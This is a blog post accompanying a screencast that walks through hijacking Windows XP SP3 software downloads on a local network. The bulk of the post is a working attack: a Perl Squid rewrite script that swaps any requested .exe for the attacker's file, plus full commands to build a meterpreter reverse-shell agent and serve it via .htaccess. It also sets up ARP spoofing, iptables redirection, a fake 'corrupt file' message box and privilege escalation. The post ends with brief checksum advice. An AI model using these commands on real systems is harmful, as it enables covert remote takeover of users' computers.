Owning Windows (XP SP3 vs. Squid)

This screencast demonstrates hijacking applications when they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either via the target or another program (For example, self-updating programs).

The attacker takes control of the traffic by doing a "Man In The Middle" (MITM) attack, to analyse the traffic, in-which if the requested file ends in ".exe", it is redirected to the attacker's web server that will always reply with the same filename as the agent creating the illusion that it was the requested file.

Please note: Unlike the other two previous videos, where the attacker was targeting programs/services that comes with the Operating System, the attacker pursuits 3rd party applications - or the process of trying to install them. The result of this is, there is more user interaction needed than before, whereas before it was either very little (visit any web page) or nothing. Therefore the attacker needs the target to perform a certain action(s) (either willing or unaware). The chosen method of attack can be performed by a simpler method, however this method was chosen for reasons of future posts.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/Owning_Windows-XP_SP3_Vs._Squid.mp4

Download Script (replace.pl): *Coming soon*

Scenario/Setup

This is the third video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 3, in the aid of seeking better security, after becoming compromised... twice. ;)

After spending hours re-formatting, installing and restarting the target is using a fully up-to-date system running Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much" as every setting is still at their default options and haven't installed any programs such as Anti-Virus, Firewalls or any browser-based application (E.g. Flash or Java). ;)

This time around, the attacker approaches the attack by attacking the process of installing new or updating existing software.

Tools

  • Nmap – (Can be found in BackTrack 4-R2)
  • PostgreSQL – (Can be found in BackTrack 4-R2)
  • Metasploit – (Can be found in BackTrack 4-R2)
  • Apache – (Can be found in BackTrack 4-R2)
  • A Text Editor – (Kate can be found in BackTrack 4-R2)
  • Squid – (Can be found in the BackTrack repository)
  • arpspoof – (Part of the DSniff suite which can be found in the BackTrack 4-R2)

replace.pl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/perl
########################################################################
# replace.pl         --- Squid Script (Application replacement)        #
# g0tmi1k 2011-03-09                                                   #
########################################################################
use IO::Handle;
use File::Basename;

$|=1;
$ourIP = "192.168.0.33";
$debug = 0;

if ($debug == 1) { open (DEBUG, '>>/tmp/replace_debug.log'); }
autoflush DEBUG 1;

while () {
   chomp $_;
   if ($_ =~ /(.*\.exe)/i) {
      if ($debug == 1) { print DEBUG "Input: $url
"; }
      $url = $1;
      $filename = basename( $url );
      $new_url = "http://$ourIP/$filename";
      print "$new_url
";
      if ($debug == 1) { print DEBUG "Filename: $filename
Output: $new_url
"; }
   }
   else {
      print "$_
";
   }
}

Method

  • Start network services and obtain an IP address
  • Create resource file and agent for metasploit
  • Start and configure metasploit to listen for the backdoor
  • Configure and start apache web server
  • Download, install and configure Squid proxy
  • Perform a man in the middle attack
  • Wait for target to download a program (either willing or unknown)
  • Game Over

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
start-network
dhclient eth0
/etc/init.d/postgresql-8.3 start
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.103 -T4 -O -v #nmap 192.168.0.103 -T4 -p- -A -v    #-T4 -p 1-65500 -O -sS -sV -v
clear
#msfconsole
#use scanner/discovery/arp_sweep
#show options
#set RHOSTS 192.168.0.1-255
#set SMAC 11:22:33:44:55:66
#set SHOST 192.168.0.1
#show options
#run

echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe #| msfencode -e x86/shikata_ga_nai -c 3 -t exe -o /var/www/evil.exe
export GOCOW=1     # Always cow logo ;)
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set ExitOnSession false
set AutoRunScript /root/replace.rb
show options
exploit -j

#kate -> New
Options +FollowSymlinks
RewriteEngine on
RewriteRule ^(.*) evil.exe
# Save: /var/www/.htaccess
#kate -> Open: /etc/apache2/sites-enabled/000-default
#Edit (Line 11): AllowOverride All
#Save
start-apache   # /etc/init.d/apache2 start

apt-cache search squid
apt-get install squid3
y
update-rc.d -f squid3 remove

Kate -> Open: replace.pl
kate -> Open: /etc/squid3/squid.conf
Add (Line: *end*): url_rewrite_program /root/replace.pl
Edit (Line 588): acl localnet src 192.168.0.0/16
Edit (Line 644): http_access allow localnet
Edit (Line 868): http_port 3128 transparent
Save
chmod 755 /root/replace.pl
/etc/init.d/squid3 restart

iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
echo 1 > /proc/sys/net/ipv4/ip_forward
#cat /proc/sys/net/ipv4/ip_forward
#Start -> run -> cmd -> arp -a
arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
#Start -> run -> cmd -> arp -a
#kate -> Open: /etc/etter.conf
##Edit (Line 17): ec_uid = 0
##Edit (Line 18): ec_gid = 0
##Edit (Line 168): redir_command_on
##Edit (Line 169): redir_command_off
##Save
#cat replace.filter
#etterfilter replace.filter -o replace.ef
##Start -> run -> cmd -> arp -a
#ettercap -T -q -i eth0 -F replace.ef -M ARP /192.168.0.1/ /192.168.0.103/
##Start -> run -> cmd -> arp -a

IE -> http://www.bing.com -> Search: flash. Download & Run

sessions -l -v
Kill arpspoof

IE -> http://www,filehippo.com -> Search: notepad++. Download Older & Run

arpspoof -i eth0 -t 192.168.0.103 192.168.0.1

Notepad++ -> Help -> Check for updates

Kill arpspoof
sessions -l -v
sessions -i 2
sysinfo
getuid
getsystem
getuid

Walkthrough

The attacker once again starts off by doing a quick sweep of the network with nmap and after identifying the target proceeds to do a port scan on the target. However this time around, no ports respond (due to the firewall being enabled by default now), which limits the returned information.


The attacker then moves onto creating a resource file for metasploit which, by using railgun calls a simple Windows API command to display a message box which is used to give feedback to the target that the program has been executed and not left wondering what’s happening.

The attacker continues the metasploit usage by creating the agent and configuring metasploit to listen for a connection back to it. Once a connection has been created the attacker sets the resource script to be automatically executed.


The attacker proceeds by setting up an Apache web server which is used to deliver the agent to the user. The attacker enables and creates a "distributed configuration file" (.htaccess), that links any requested URL to the metasploit agent and returns with the same name as requested.


As the attacker now has a backdoor and a delivery system ready the attacker needs a method of filtering the web traffic to create a rule to replace any requested URL which ends in EXE (which is a very common application extension used in a windows environment) to be redirected to the attacker's web server instead. The attacker installs Squid3 cache proxy that can do such a thing by using a perl script (replace.pl).

Ettercap could have also been used for an alternative solution, however due to limited scripting functionality the results weren't as high.


As everything is now ready, the attacker just needs to redirect the traffic via their machine. Like before, the attack performs an ARP man in the middle attack with the aid of arpspoof.


Everything is in place and ready for the target to request a program. This can be done by either requesting it themselves (visiting a site and downloading it "manually") or by a program that is already installed (it has to check for an update, fidn that there is an update available and automatically download & execute the program.)


After waiting, the attacker notices that a session has been created and is able to stop the man in the middle attack as the attacker doesn't need to have the target's traffic as they have a direct connection to the target themselves.


A simple bit of privilege escalation gives the attacker complete access to the target's machine.

Notes

  • The recording software did glitch in a few places - of which I re-recorded a section and edited it in.
  • The first time when the target tries to download an application, they click on the notification bar at the top, rather than re-clicking on the click.
  • Adobe flash official web site, detects the browser agent and uses a different delivery system to install, which wouldn't have worked in default browser (Internet Explorer).
  • Not every auto-update features use ".exe" files to update.
  • It is recommended to check the checksum (E.g. MD5 or SHA1) of download programs before executing.
  • It is recommended to only download from the official sites, sources or mirrors. Flash was downloaded from adobe.com (filehippo redirects to it), whereas notepad was hosted on filehippo.com

Song: Free Your Soul - Command Strange & Strings Track (Apex Remix) - Bachelors of Science

Video length: 10:00

Capture length: 34:11

Blog Post: https://blog.g0tmi1k.com/2011/03/owning-windows-xp-sp3-vs-squid/